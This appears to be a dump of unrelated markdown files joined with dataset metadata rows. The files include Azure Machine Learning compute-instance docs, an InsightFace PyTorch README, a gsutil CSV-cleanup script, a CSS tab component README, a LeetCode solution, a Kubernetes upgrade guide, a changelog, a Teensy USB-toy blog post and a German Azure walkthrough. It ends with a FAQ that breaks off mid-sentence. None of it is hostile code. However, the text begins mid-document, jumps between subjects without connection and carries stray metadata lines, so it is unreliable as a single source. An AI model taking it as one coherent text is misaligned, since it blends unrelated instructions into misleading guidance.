* SSH into the compute instance. SSH access is disabled by default but can be enabled at compute instance creation time. SSH access is through a public/private key mechanism. The tab gives you details for SSH connections such as IP address, username, and port number.
* Get details about a specific compute instance, such as IP address and region.

[RBAC](/azure/role-based-access-control/overview) allows you to control which users in the workspace can create, delete, start, stop, and restart a compute instance. All users in the workspace contributor and owner roles can create, delete, start, stop, and restart compute instances across the workspace. However, only the creator of a specific compute instance, or the user assigned to it if it was created on their behalf, is allowed to access Jupyter, JupyterLab, and RStudio on that compute instance. A compute instance is dedicated to a single user who has root access, and can terminal in through Jupyter/JupyterLab/RStudio. A compute instance has single-user log-in, and all actions use that user's identity for RBAC and attribution of experiments. SSH access is controlled through the public/private key mechanism.

These actions can be controlled by RBAC:

* *Microsoft.MachineLearningServices/workspaces/computes/read*
* *Microsoft.MachineLearningServices/workspaces/computes/write*
* *Microsoft.MachineLearningServices/workspaces/computes/delete*
* *Microsoft.MachineLearningServices/workspaces/computes/start/action*
* *Microsoft.MachineLearningServices/workspaces/computes/stop/action*
* *Microsoft.MachineLearningServices/workspaces/computes/restart/action*

### <a name="create-a-compute-instance"></a><a name="create"></a>Create a compute instance

In your workspace in Azure Machine Learning studio, [create a new compute instance](how-to-create-attach-compute-studio.md#compute-instance) from either the **Compute** section, or in the **Notebooks** section when you are ready to run one of your notebooks.
You can also create an instance

* Directly from the [integrated notebooks experience](tutorial-1st-experiment-sdk-setup.md#azure)
* In the Azure portal
* From an Azure Resource Manager template. For an example template, see the [create an Azure Machine Learning compute instance template](https://github.com/Azure/azure-quickstart-templates/tree/master/101-machine-learning-compute-create-computeinstance)
* With the [Azure Machine Learning SDK](https://github.com/Azure/MachineLearningNotebooks/blob/master/how-to-use-azureml/training/train-on-computeinstance/train-on-computeinstance.ipynb)
* From the [CLI extension for Azure Machine Learning](reference-azure-machine-learning-cli.md#computeinstance)

The dedicated cores per region per VM family quota and total regional quota, which applies to compute instance creation, is unified and shared with the Azure Machine Learning training compute cluster quota. Stopping the compute instance does not release quota, to ensure you will be able to restart the compute instance.

### <a name="create-on-behalf-of-preview"></a>Create on behalf of (preview)

As an administrator, you can create a compute instance on behalf of a data scientist and assign the instance to them with:

* An [Azure Resource Manager template](https://github.com/Azure/azure-rest-api-specs/blob/master/specification/machinelearningservices/resource-manager/Microsoft.MachineLearningServices/preview/2020-09-01-preview/examples/createComputeInstance.json). For details on how to find the TenantID and ObjectID needed in this template, see [Find identity object IDs for authentication configuration](../healthcare-apis/find-identity-object-ids.md). You can also find these values in the Azure Active Directory portal.
* The REST API

The data scientist you create the compute instance for needs the following RBAC permissions:

* *Microsoft.MachineLearningServices/workspaces/computes/start/action*
* *Microsoft.MachineLearningServices/workspaces/computes/stop/action*
* *Microsoft.MachineLearningServices/workspaces/computes/restart/action*
* *Microsoft.MachineLearningServices/workspaces/computes/applicationaccess/action*

The data scientist can start, stop, and restart the compute instance. They can use the compute instance for:

* Jupyter
* JupyterLab
* RStudio
* Integrated notebooks

## <a name="compute-target"></a>Compute target

Compute instances can be used as a [training compute target](concept-compute-target.md#train), similar to Azure Machine Learning compute training clusters. A compute instance:

* Has a job queue.
* Runs jobs securely in a virtual network environment, without requiring enterprises to open up an SSH port. The job executes in a containerized environment and packages your model dependencies in a Docker container.
* Can run multiple small jobs in parallel (preview). Two jobs per core can run in parallel while the rest of the jobs are queued.
* Supports single-node multi-GPU distributed training jobs

You can use a compute instance as a local inferencing deployment target for test/debug scenarios.

## <a name="what-happened-to-notebook-vm"></a><a name="notebookvm"></a>What happened to Notebook VM?

Compute instances are replacing the Notebook VM. Any notebook files stored in the workspace file share and data in workspace datastores are accessible from a compute instance. However, any custom packages previously installed on a Notebook VM need to be reinstalled on the compute instance.
Quota limitations, which apply to compute cluster creation, also apply to compute instance creation.

New Notebook VMs cannot be created. However, you can still access and use the Notebook VMs you have created, with full functionality. Compute instances can be created in the same workspace as the existing Notebook VMs.

## <a name="next-steps"></a>Next steps

* [Tutorial: train your first ML model](tutorial-1st-experiment-sdk-train.md) shows how to use a compute instance with an integrated notebook.
# InsightFace_Pytorch

Pytorch 0.4.1 codes for InsightFace

- - -

## 1. Intro

* This repo is a reimplementation of Arcface[(paper)](https://arxiv.org/abs/1801.07698), or Insightface[(github)](https://github.com/deepinsight/insightface)
* It includes PyTorch implementations of the backbone modules of Arcface and MobileFacenet
* Codes for transforming MXNet data records from Insightface[(github)](https://github.com/deepinsight/insightface) into image data folders are provided
* Pretrained models are posted, including the [MobileFacenet](https://arxiv.org/abs/1804.07573) and the IR-SE50 from the original paper

- - -

## 2. Pretrained Models & Performance

[IR-SE50 @ BaiduNetdisk](https://pan.baidu.com/s/12BUjjwy1uUTEF9HCx5qvoQ), [IR-SE50 @ Onedrive](https://1drv.ms/u/s!AhMqVPD44cDOhkPsOU2S_HFpY9dC)

| LFW(%) | CFP-FF(%) | CFP-FP(%) | AgeDB-30(%) | calfw(%) | cplfw(%) | vgg2_fp(%) |
| ------ | --------- | --------- | ----------- | -------- | -------- | ---------- |
| 0.9952 | 0.9962 | 0.9504 | 0.9622 | 0.9557 | 0.9107 | 0.9386 |

[Mobilefacenet @ BaiduNetDisk](https://pan.baidu.com/s/1hqNNkcAjQOSxUjofboN6qg), [Mobilefacenet @ OneDrive](https://1drv.ms/u/s!AhMqVPD44cDOhkSMHodSH4rhfb5u)

| LFW(%) | CFP-FF(%) | CFP-FP(%) | AgeDB-30(%) | calfw(%) | cplfw(%) | vgg2_fp(%) |
| ------ | --------- | --------- | ----------- | -------- | -------- | ---------- |
| 0.9918 | 0.9891 | 0.8986 | 0.9347 | 0.9402 | 0.8660 | 0.9100 |

## 3. How to use

* clone

```
git clone https://github.com/TropComplique/mtcnn-pytorch.git
```

### 3.1 Data Preparation

#### 3.1.1 Prepare Facebank (for testing over camera or video)

Provide the face images you want to detect in the data/facebank folder, and make sure it has a structure like the following:

```
data/facebank/
        ---> id1/
            ---> id1_1.jpg
        ---> id2/
            ---> id2_1.jpg
        ---> id3/
            ---> id3_1.jpg
            ---> id3_2.jpg
```

#### 3.1.2 Download the pretrained model to work_space/model

If more than one image appears in a folder, an average embedding will be calculated.

#### 3.1.3 Prepare Dataset (for training)

Download the refined dataset from the original post (emore recommended):

* [Refined-MS1M@BaiduDrive](https://pan.baidu.com/s/1nxmSCch), [Refined-MS1M@GoogleDrive](https://drive.google.com/file/d/1XRdCt3xOw7B3saw0xUSzLRub_HI4Jbk3/view)
* [VGGFace2@BaiduDrive](https://pan.baidu.com/s/1c3KeLzy), [VGGFace2@GoogleDrive](https://drive.google.com/open?id=1KORwx_DWyIScAjD6vbo4CSRu048APoum)
* [emore dataset @ BaiduDrive](https://pan.baidu.com/s/1c3KeLzy), [emore dataset @ OneDrive](https://pan.baidu.com/s/1c3KeLzy)

**Note:** If you use the refined [MS1M](https://arxiv.org/abs/1607.08221) dataset and the cropped [VGG2](https://arxiv.org/abs/1710.08092) dataset, please cite the original papers.

* After unzipping the files to the 'data' path, run:

```
python prepare_data.py
```

After the execution, you should find the following structure:

```
faces_emore/
            ---> agedb_30
            ---> calfw
            ---> cfp_ff
            ---> cfp_fp
            ---> cplfw
            ---> imgs
            ---> lfw
            ---> vgg2_fp
```

- - -

### 3.2 Detect over camera:

1. Download the desired weights to the model folder:
    - [IR-SE50 @ BaiduNetdisk](https://pan.baidu.com/s/12BUjjwy1uUTEF9HCx5qvoQ)
    - [IR-SE50 @ Onedrive](https://1drv.ms/u/s!AhMqVPD44cDOhkPsOU2S_HFpY9dC)
    - [Mobilefacenet @ BaiduNetDisk](https://pan.baidu.com/s/1hqNNkcAjQOSxUjofboN6qg)
    - [Mobilefacenet @ OneDrive](https://1drv.ms/u/s!AhMqVPD44cDOhkSMHodSH4rhfb5u)

2. To take a picture, run:

    ```
    python take_pic.py -n name
    ```

    Press q to take a picture. It will only capture the single highest-probability face if more than one person appears in front of the camera.

3. Or you can put any preexisting photo into the facebank directory; the file structure is as follows:

    ```
    - facebank/
        name1/
            photo1.jpg
            photo2.jpg
            ...
        name2/
            photo1.jpg
            photo2.jpg
            ...
        .....
    if more than 1 image appears in the directory, an average embedding will be calculated
    ```

4. To start:

    ```
    python face_verify.py
    ```

- - -

### 3.3 Detect over video:

```
python infer_on_video.py -f [video file name] -s [save file name]
```

The video file should be inside the data/facebank folder.

- Video Detection Demo [@Youtube](https://www.youtube.com/watch?v=6r9RCRmxtHE)

### 3.4 Training:

```
python train.py -b [batch_size] -lr [learning rate] -e [epochs]

# python train.py -net mobilefacenet -b 200 -w 4
```

## 4. References

* This repo is mainly inspired by [deepinsight/insightface](https://github.com/deepinsight/insightface) and [InsightFace_TF](https://github.com/auroua/InsightFace_TF)

## PS

* PRs are welcome, since I don't have the resources to train some large models like the 100- and 151-layer models
* Email: treb1en@qq.com
# Tips for data collection

## Google Bucket

Most data is stored as a CSV file in a Google Bucket. The code has been developed such that the data is stored as a single CSV file rather than multiple CSV files (i.e., we use .repartition(1) to bring all data to a single worker). This makes it much easier to postprocess the data.

The first step is to get the data from the target bucket. This can easily be done from your local development machine using the `gsutil` tool. For example, if I'm trying to copy the CSV files stored in my `_multilayer` output directory to my current path, I'd simply type the following in the terminal:

```
gsutil -m cp -r gs://eecs-e6895-bucket/output/_multilayer/20200514095202/* .
```

Now that the data is copied to your local machine, you will notice that the actual CSV file is located beneath a subdirectory that has the name identified in the code. That is, if I tell my code to store the data as 'imafile.csv', then the data in the bucket would actually be saved as 'imafile.csv/123abc456xyz.csv'. This is very standard for Google Dataproc, but is not necessarily how I like to view my data -- so I wrote a Python script that recursively goes through every directory ending with `.csv`, copies the name of the subdirectory and renames the file (with a prefix) accordingly, moves the file out of the subdirectory, removes the subdirectory, and removes the prefix from the file. Bingo!
```python
import os
import shutil

# Collect the Dataproc-style *.csv output directories
files_in_path = os.listdir(self.csv_path)
csv_paths = []
for file in files_in_path:
    if file.endswith(".csv"):
        csv_paths.append(os.path.join(self.csv_path, file))

# Move the part-file out of each directory, staged under a "moved_" prefix
for path in csv_paths:
    name = os.path.basename(path)
    try:
        for file in os.listdir(path):
            if file.endswith(".csv"):
                os.rename(os.path.join(path, file),
                          os.path.join(self.csv_path, "moved_" + name))
    except Exception as e:
        print("Failed to rename file in path {}: {}".format(path, e))

# Remove the now-empty directories and strip the "moved_" prefix
# (re-list the path so the freshly moved files are seen)
for file in os.listdir(self.csv_path):
    file_path = os.path.join(self.csv_path, file)
    if file.endswith(".csv"):
        if not file.startswith("moved_"):
            try:
                shutil.rmtree(file_path)
            except Exception as e:
                print("Failed to remove directory {}: {}".format(file_path, e))
        if file.startswith("moved_"):
            try:
                os.rename(file_path, file_path.replace('moved_', ''))
            except Exception as e:
                print("Failed to rename file {}: {}".format(file_path, e))
```

\* it could probably be a lot more 'pythonic'
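For reference, the same flatten-and-rename idea can be sketched as a standalone function using `pathlib` (a hypothetical helper, not part of the project's actual class; it assumes the same `imafile.csv/123abc456xyz.csv` layout described above):

```python
import shutil
from pathlib import Path


def flatten_csv_outputs(csv_path):
    """Move the single part-file out of each Dataproc-style `*.csv`
    output directory, rename it to the directory's name, and delete
    the now-empty directory."""
    root = Path(csv_path)
    out_dirs = [p for p in root.iterdir() if p.is_dir() and p.suffix == ".csv"]
    for out_dir in out_dirs:
        parts = sorted(out_dir.glob("*.csv"))
        if not parts:
            continue  # nothing to flatten in this directory
        # Stage under a temporary name so we never clobber the directory name
        staged = root / ("moved_" + out_dir.name)
        parts[0].rename(staged)
        shutil.rmtree(out_dir)               # remove the redundant directory
        staged.rename(root / out_dir.name)   # final name matches the old directory
```

Calling `flatten_csv_outputs(".")` after the `gsutil cp` step leaves one plain CSV per output name in the current directory.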
# Tabsy CSS #

## Simple tabs toggler component written in pure CSS with no dependencies ##

### Install ###

With npm:

```sh
npm install tabsy-css
```

With Bower:

```sh
bower install tabsy-css
```

### Usage ###

Include the css:

```sh
<link href='tabsy.css' rel='stylesheet' type='text/css'>
```

The initial required structure; place any content you want within the tabs:

```sh
<div class="tabsy">

    <input type="radio" id="tab1" name="tab" checked>
    <label class="tabButton" for="tab1">Tab One</label>
    <div class="tab">
        <div class="content">
            Content One
        </div>
    </div>

    <input type="radio" id="tab2" name="tab">
    <label class="tabButton" for="tab2">Tab Two</label>
    <div class="tab">
        <div class="content">
            Content Two
        </div>
    </div>

    <input type="radio" id="tab3" name="tab">
    <label class="tabButton" for="tab3">Tab Three</label>
    <div class="tab">
        <div class="content">
            Content Three
        </div>
    </div>

</div>
```

Note: only one radio input in the group should carry the `checked` attribute (the initially active tab).

### Demo ###

Demo available [here](http://robiveli.github.io/tabsy-css/).

### Options ###

Default css settings are placed in `library/_variables.scss`.

### Note ###

Based on the Flexbox feature. Where it is not supported, a simple fallback is applied.

### License ###

Tabsy CSS is licensed under the [MIT license](http://opensource.org/licenses/MIT).
# LC387. First Unique Character in a String

### LeetCode

## Question

Given a string, find the first non-repeating character in it and return its index. If it doesn't exist, return -1.

**Examples:**

```
s = "leetcode"
return 0.

s = "loveleetcode",
return 2.
```

**Note:** You may assume the string contains only lowercase letters.

## Solutions

### Solution 1

* C++ (42ms)

```
int firstUniqChar(string s) {
    int count[128] = {0};
    for (char c : s)
        count[c]++;
    for (int i = 0; i < s.length(); ++i)
        if (count[s[i]] == 1)
            return i;
    return -1;
}
```

Use an array `count` to remember the number of occurrences of each letter in `s`. Then traverse the string `s` again; the index of the first letter with count `1` is the result.

**Complexity:**

* **worst-case time complexity:** `O(n)`, where `n` is the length of `s`.
* **worst-case space complexity:** `O(1)`.
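For comparison, the same two-pass counting approach can be sketched in Python (not part of the original solution set):

```python
from collections import Counter


def first_uniq_char(s: str) -> int:
    """Return the index of the first non-repeating character, or -1."""
    counts = Counter(s)        # first pass: count each character
    for i, c in enumerate(s):  # second pass: first character seen exactly once
        if counts[c] == 1:
            return i
    return -1
```

The complexity is the same: `O(n)` time and `O(1)` extra space, since the alphabet is bounded.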
# Upgrading Kubernetes

This document describes upgrading the Kubernetes components on a cluster's master and worker nodes. For general information on Kubernetes cluster management and upgrades (including more advanced topics such as major API version upgrades), see the [Kubernetes upstream documentation](http://kubernetes.io/v1.1/docs/admin/cluster-management.html) and [version upgrade notes](http://kubernetes.io/v1.1/docs/design/versioning.html#upgrades).

**NOTE:** The following upgrade documentation is for installations based on the CoreOS + Kubernetes step-by-step [installation guide](https://coreos.com/kubernetes/docs/latest/getting-started.html). Upgrade documentation for the AWS CloudFormation-based installation is forthcoming.

## Upgrading the Kubelet

The kubelet runs on both master and worker nodes, and the binary ships as part of the CoreOS image. As the host OS is updated, the kubelet will be upgraded as well. This step will not be covered in the guides below; more information can be found in the [CoreOS Updates Documentation](https://coreos.com/using-coreos/updates).

To run a custom version of the kubelet, modify the kubelet service file on each node (`/etc/systemd/system/kubelet.service`) to contain the path to the custom kubelet binary.

## Upgrading Master Nodes

Master nodes consist of the following Kubernetes components:

* kube-proxy
* kube-apiserver
* kube-controller-manager
* kube-scheduler
* kube-podmaster (high-availability)

While upgrading the master components, user pods on worker nodes will continue to run normally.

### Upgrading kube-apiserver and kube-proxy

Both the kube-apiserver and kube-proxy are run as "static pods". This means the pod definition is a file on disk (default location: `/etc/kubernetes/manifests`). To update these components, you simply need to update the static manifest file. When the manifest changes on disk, the kubelet will pick up the changes and restart the local pod.
For example, to upgrade the kube-apiserver version you could update the pod image tag in `/etc/kubernetes/manifests/kube-apiserver.yaml`:

From: `image: gcr.io/google_containers/hyperkube:v1.0.6`

To: `image: gcr.io/google_containers/hyperkube:v1.0.7`

The kubelet would then restart the pod, and the new image version would be used.

**NOTE:** If you are running a multi-master high-availability cluster, please see the next section on upgrading the remaining master node components. Otherwise you can upgrade the remaining static pods (controller-manager, scheduler) using the same process described above.

### Upgrading Remaining Master Node Components (High-Availability)

The kube-controller-manager, kube-scheduler, and kube-podmaster are all also deployed as static pods in `/etc/kubernetes/manifests`. However, in high-availability deployments, the kube-podmaster is responsible for making sure only a single copy of the controller-manager and scheduler are running cluster-wide.

To accomplish this, the kube-podmaster on each master node, if leader-elected, will copy the static manifest from `/srv/kubernetes/manifests` into `/etc/kubernetes/manifests`, and the kubelet will pick up the manifest and run the pod. If the kube-podmaster loses its status as leader, it will remove the static pod from `/etc/kubernetes/manifests/` and the kubelet will shut down the pod.

This configuration means upgrading these components will take a little more coordination. To upgrade the kube-controller-manager and kube-scheduler:

1. For each master node:
    1. Make changes to the base manifests in `/srv/kubernetes/manifests`
    1. Remove the existing manifests (if present) from `/etc/kubernetes/manifests`
    1. The kube-podmaster will automatically fetch the new manifest from `/srv/kubernetes/manifests`, copy it to `/etc/kubernetes/manifests`, and the new pod will be started.

**NOTE:** Because a particular master node may not be elected to run a particular component (e.g. kube-scheduler), updating the local manifest may not update the currently active instance of the pod. You should update the manifests on all master nodes to ensure that no matter which is active, all will reflect the updated manifest.

### Upgrading Worker Nodes

Worker nodes consist of the following Kubernetes components:

* kube-proxy

### Upgrading the kube-proxy

The kube-proxy is run as a "static pod". To upgrade the pod definition, simply modify the pod manifest located in `/etc/kubernetes/manifests/kube-proxy.yaml`. The kubelet will pick up the changes and re-launch the kube-proxy pod.

## Example Upgrade Process

1. Prepare new pod manifests for master nodes
1. Prepare new pod manifests for worker nodes
1. For each master node:
    1. Back up existing manifests
    1. Update manifests
1. Repeat item 3 for each worker node
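The image-tag edit described above can also be scripted. A minimal sketch (a hypothetical helper, using a plain regex substitution rather than a YAML parser, and assuming the `hyperkube` image line shown earlier):

```python
import re


def bump_hyperkube_tag(manifest_text: str, new_tag: str) -> str:
    """Replace the tag on any `image: gcr.io/google_containers/hyperkube:vX.Y.Z`
    line with `new_tag` (e.g. "v1.0.7"). Since the kubelet watches
    /etc/kubernetes/manifests, writing the result back to the manifest file
    is enough to make it restart the static pod."""
    return re.sub(
        r"(image:\s*gcr\.io/google_containers/hyperkube:)v[\w.\-]+",
        r"\g<1>" + new_tag,
        manifest_text,
    )
```

In practice you would read `/etc/kubernetes/manifests/kube-apiserver.yaml`, pass its contents through this function, and write the result back on each node in turn.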
# P118-6

# P180-6
# Change Log

All notable changes to this project will be documented in this file. See [standard-version](https://github.com/conventional-changelog/standard-version) for commit guidelines.

<a name="0.3.0"></a>
# [0.3.0](https://github.com/myrmex-org/myrmex/compare/@myrmex/lambda@0.2.3...@myrmex/lambda@0.3.0) (2017-07-06)

### Features

* **lambda:** improve lambda execution messages and python3 execution ([0acc2a9](https://github.com/myrmex-org/myrmex/commit/0acc2a9))

<a name="0.2.3"></a>
## [0.2.3](https://github.com/myrmex-org/myrmex/compare/@myrmex/lambda@0.2.2...@myrmex/lambda@0.2.3) (2017-07-04)

<a name="0.2.2"></a>
## [0.2.2](https://github.com/myrmex-org/myrmex/compare/@myrmex/lambda@0.2.1...@myrmex/lambda@0.2.2) (2017-07-04)

<a name="0.2.1"></a>
## [0.2.1](https://github.com/myrmex-org/myrmex/compare/@myrmex/lambda@0.2.0...@myrmex/lambda@0.2.1) (2017-06-30)
---
title: Teensy Moonica, The 8-Legged Gift for A Developer
category: Projects
tags:
- python
- c#
- project
- electronics
- circuit
- teensy
- microcontroller
- usb
comments:
- id: 2687
  author: Katrin
  author_email: loodus.katrin@gmail.com
  author_url: ''
  date: '2013-06-17 12:39:02 +0300'
  date_gmt: '2013-06-17 09:39:02 +0300'
  content: "Übernunnu!\r\n\r\nIt looks really adorable and I'm pretty sure it can be a very useful tool also for IT system administrators... So good work and I hope that Moonica has won the heart of its new owner and of course the heart of other octopus-electronics-lovers! :) \r\n\r\nAnd a little message from the EIK robotics club (HAL vol 2):\"We hope to see you here again with your new cool projects as well! :)\""
---
A <a href="http://waher.net">good friend of mine</a> had a birthday coming up and I found myself socially obligated to do something about that. The idea - use my skills as a developer to <a href="http://makershed.com">MAKE</a> something developer-ish. This was a collaborative project with <a href="http://sokeri.org/">Valeria</a>.

<blockquote>
I buy more things than I make. I used to think it was a sign of some kind of capitalistic progress to be able to buy food and gifts instead of making them myself, but I’m not sure anymore. When it comes to difference making there is a different trend line. Money can come and go, but my time on this planet is finite. How I spend my time, or who I spend it with means more than anything else in my universe. From at least the selfish view, giving my time is the most valuable gift I can give.<br />
<a href="http://scottberkun.com/essays/49-how-to-make-a-difference/">Scott Berkun, essay #49 - How to make a difference</a>
</blockquote>

<h1>Idea</h1>

Build hardware that can interface with a computer (via the USB port) and send input commands to the PC that can be detected and processed. As a bonus, include output devices such as LEDs that could be activated from code.
The idea came from the fact that I found myself typing PHPUnit commands for different test suites manually way too often. Wouldn't it be great to activate a test suite with a press of a button and have a green LED light up when everything is done (or a red one in case of a failure)? "Normal" people would go "???" about this, but trust me, for a developer, this is good stuff.

![UI draft]({{ site.url }}/content/2013/06/ui-draft.jpg)

I came up with a rectangular-shaped control panel. Really fancy stuff, like you see in sci-fi movies or airplanes. Excited, I got in touch with a mutual friend who also happens to be a designer. A brainstorming session and a couple of hours later, the original idea had been morphed into a much cuddlier version - a USB soft toy. The toy would be an octopus with eight legs, and each leg would act as a switch. I was to build the electronics innards while she'd do the sewing part.

<h2>Parts</h2>
<ul>
<li><a href="http://www.pjrc.com/teensy/index.html">Teensy 2.0 Microcontroller (with pins)</a></li>
<li><a href="http://uk.farnell.com/te-connectivity-amp/1-215297-6/socket-vertical-1row-16way/dp/3419174?Ntt=1-215297-6">1-215297-6 Socket</a></li>
<li>2x RGB LED</li>
<li><a href="http://www.adafruit.com/products/1010">8x pushbuttons</a></li>
<li>1x Piezo Buzzer</li>
<li>6x 960R resistors for the LEDs</li>
<li>Some wire for connecting the components</li>
<li><a href="http://www.oomipood.ee/en/product/cable-161/cable-161-usb-2-0-cable-a-male-mini-usb">Mini USB cable for the Teensy</a></li>
</ul>

<h2>Tools</h2>
<ul>
<li>Adjustable temperature soldering iron and solder, solder paste</li>
<li>Hot air gun for the heat shrink</li>
<li>Wire-handling tools: pliers, strippers, clippers</li>
<li>Digital multimeter</li>
<li>Breadboard and jumpers for prototyping</li>
<li>Helping Hands</li>
</ul>

<h1>The Build</h1>

![Breadboard]({{ site.url }}/content/2013/06/build.jpg)

Prototyping was quite fast.
This was my first bigger build and I had to figure out how to use PWM to control the buzzer and LED brightness. In no time at all, the circuit was assembled on my breadboard. I used the equipment of the robotics lab of EIK to assemble and solder the circuit. Software was a bit trickier. A lot of hours went into refactoring and documentation. The most complex part was serial communication. Initially, I tried to be verbose, sending button events as long strings ("Button 1 pressed") and parsing the string in Python. Then I saw <a href="http://www.youtube.com/watch?v=Cy9MIoG5z4s">Saying a Lot with Very Little (Arduino Digital Input to Python)</a> and refactored the code to send all button states as one byte - a much more efficient way to communicate. <h2>Oops!</h2> Val and I had hacking evenings on several occasions. During the last one, an accident happened. It turns out that the contacts of microswitches are actually quite fragile (go figure) and do not like to be abused. I managed to break one of the already assembled switches, which meant no joy for that evening. All of the switches were replaced with a sturdier version, this time with the solder connections made at the correct angle to begin with. Adafruit's tactile square buttons fit the build and replaced the less durable buttons. <h1>Finale</h1> Moonica - the name of our animal - was stuffed and wrapped and given to the birthday boy (although by the time the project was finished, the actual birthday was two months in the past). ![Moonica]({{ site.url }}/content/2013/06/moonica.jpg) The project was great fun to do and also taught us a lot. I got into electronics in January 2013 and this was the first "official", non-prototype build. I learned to program in C / Arduino, got to try out PWM and implement serial interfacing. 
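The one-byte status protocol is easy to mirror on the receiving side. Here is a minimal Python sketch of a decoder (the function name and bit order are illustrative assumptions, not taken from the project source):

```python
def decode_button_states(status_byte):
    """Unpack one status byte into eight booleans, one per octopus leg.

    Bit i is assumed to carry the state of button i + 1 (1 = pressed);
    the actual firmware may order the bits differently.
    """
    return [bool((status_byte >> i) & 1) for i in range(8)]


# Buttons 1 and 3 pressed -> bits 0 and 2 set
print(decode_button_states(0b00000101))
```

Compared to parsing strings like "Button 1 pressed", a single byte carries the state of all eight switches in one read.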
<iframe width="560" height="315" src="http://www.youtube.com/embed/a_wgeVvpjbw" frameborder="0" allowfullscreen></iframe> <h1>Links</h1> <ul> <li><a href="https://plus.google.com/photos/110367256187822089038/albums/5889699940176485425">Build photos</a></li> <li><a href="http://www.youtube.com/watch?v=a_wgeVvpjbw&amp;feature=youtu.be">Project video on YouTube</a></li> <li><a href="https://www.circuitlab.com/circuit/s6dr46/teensy-moonica/">Schematic</a></li> <li><a href="https://github.com/anroots/teensy-moonica">Source code</a></li> </ul>
64.373737
546
0.748313
eng_Latn
0.993633
6f60537563c9645e8877cb42e2022ea44ae1a285
3,751
md
Markdown
articles/machine-learning/machine-learning-walkthrough-1-create-ml-workspace.md
diablo444/azure-docs.de-de
168079679b8171e6c2b6957d21d581f05752689d
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/machine-learning/machine-learning-walkthrough-1-create-ml-workspace.md
diablo444/azure-docs.de-de
168079679b8171e6c2b6957d21d581f05752689d
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/machine-learning/machine-learning-walkthrough-1-create-ml-workspace.md
diablo444/azure-docs.de-de
168079679b8171e6c2b6957d21d581f05752689d
[ "CC-BY-4.0", "MIT" ]
1
2022-01-21T14:22:47.000Z
2022-01-21T14:22:47.000Z
--- title: 'Step 1: Create a Machine Learning workspace | Microsoft Docs' description: "Walkthrough for developing a predictive solution, step 1: Learn how to set up a new Azure Machine Learning Studio workspace." services: machine-learning documentationcenter: author: garyericson manager: jhubbard editor: cgronlun ms.assetid: b3c97e3d-16ba-4e42-9657-2562854a1e04 ms.service: machine-learning ms.workload: data-services ms.tgt_pltfrm: na ms.devlang: na ms.topic: article ms.date: 03/23/2017 ms.author: garye translationtype: Human Translation ms.sourcegitcommit: 4f2230ea0cc5b3e258a1a26a39e99433b04ffe18 ms.openlocfilehash: 8ca42ef8f5314866301f5c9e93caa90dc837a66e ms.lasthandoff: 03/25/2017 --- # <a name="walkthrough-step-1-create-a-machine-learning-workspace"></a>Walkthrough step 1: Create a Machine Learning workspace This is the first step of the walkthrough [Develop a predictive analytics solution with Azure Machine Learning](machine-learning-walkthrough-develop-predictive-solution.md). 1. **Create a Machine Learning workspace** 2. [Upload existing data](machine-learning-walkthrough-2-upload-data.md) 3. [Create a new experiment](machine-learning-walkthrough-3-create-new-experiment.md) 4. [Train and evaluate the models](machine-learning-walkthrough-4-train-and-evaluate-models.md) 5. [Deploy the web service](machine-learning-walkthrough-5-publish-web-service.md) 6. [Access the web service](machine-learning-walkthrough-6-access-web-service.md) - - - <!-- This needs to be updated to refer to the new way of creating workspaces in the Ibiza portal --> To use Machine Learning Studio, you need a Microsoft Azure Machine Learning workspace. This workspace contains the tools you need to create, manage, and publish experiments. 
<!-- ## To create a workspace 1. Sign in to the [Azure classic portal](https://manage.windowsazure.com). 2. In the Azure services panel, click **MACHINE LEARNING**. ![Create workspace][1] 3. Click **CREATE AN ML WORKSPACE**. 4. On the **QUICK CREATE** page, enter your workspace information and then click **CREATE AN ML WORKSPACE**. --> The administrator for your Azure subscription has to create the workspace and then add you as an owner or contributor. For details, see [Create and share an Azure Machine Learning workspace](machine-learning-create-workspace.md). Once your workspace is created, open Machine Learning Studio ([https://studio.azureml.net/Home](https://studio.azureml.net/Home)). If you have more than one workspace, you can select the workspace from the toolbar in the upper-right corner of the window. ![Select a workspace in Studio][2] > [!TIP] > If you were added as an owner of the workspace, you can share the experiments you're working on by inviting other people to the workspace. You can do this in Machine Learning Studio on the **SETTINGS** page. You just need the Microsoft account or organizational account of each user. > > On the **SETTINGS** page, click **USERS**, then click **INVITE MORE USERS** at the bottom of the window. > > - - - **Next step: [Upload existing data](machine-learning-walkthrough-2-upload-data.md)** [1]: ./media/machine-learning-walkthrough-1-create-ml-workspace/create1.png [2]: ./media/machine-learning-walkthrough-1-create-ml-workspace/open-workspace.png
55.985075
362
0.796321
deu_Latn
0.878121
6f60e9e394e1d24664ec80f859bfa12f609876a4
2,095
md
Markdown
node_modules/inline-style-prefixer/docs/FAQ.md
variablemayank/mathquill-keypad
cfd6b3ff74081824f23e9c816078d12eeeecbcbb
[ "MIT" ]
null
null
null
node_modules/inline-style-prefixer/docs/FAQ.md
variablemayank/mathquill-keypad
cfd6b3ff74081824f23e9c816078d12eeeecbcbb
[ "MIT" ]
2
2020-04-30T13:37:47.000Z
2021-09-02T16:16:34.000Z
node_modules/inline-style-prefixer/docs/FAQ.md
variablemayank/mathquill-keypad
cfd6b3ff74081824f23e9c816078d12eeeecbcbb
[ "MIT" ]
5
2019-12-18T09:10:32.000Z
2020-02-24T09:33:49.000Z
# FAQ 1. [How can I disable the warnings?](#1-disable-warnings) (for tests) 2. [How can I do server-side rendering?](#2-server-side-rendering) 3. [Why is my userAgent not supported?](#3-unsupported-useragent) 4. [Why do some Cordova apps & in-app browser have issues?](#4-cordova-apps--in-app-browser) ## 1. Disable warnings If you're running tests and want to get rid of the warnings, you might need to set a `global.navigator` and pass a **valid** userAgent that gets validated correctly, e.g. ```javascript // Chrome 49 userAgent global.navigator = {userAgent: 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2454.85 Safari/537.36'} ``` ([Radium's FAQ reference](https://github.com/FormidableLabs/radium/tree/master/docs/faq#how-can-i-get-rid-of-useragent-warnings-in-tests)) ## 2. Server-side rendering When doing server-side rendering, there is no `window.navigator` that can be used by default. You need to pass a valid `userAgent` (preferably taken from the request headers) to the prefixer instance. ## 3. Unsupported userAgent If you still get the warning even when using a valid `userAgent`, the issue is most likely caused by [bowser](https://github.com/ded/bowser), which is the browser detection library this prefixer is built on. In most cases bowser fails to detect the correct browser information. To check if that's the case, simply use this snippet: ```javascript console.log(new Prefixer()._browserInfo) ``` ## 4. Cordova apps & in-app browser We have seen different issues with [Cordova](https://cordova.apache.org)-based mobile applications as well as several in-app browsers. This is due to their userAgent, which differs from the default ones.<br> This especially 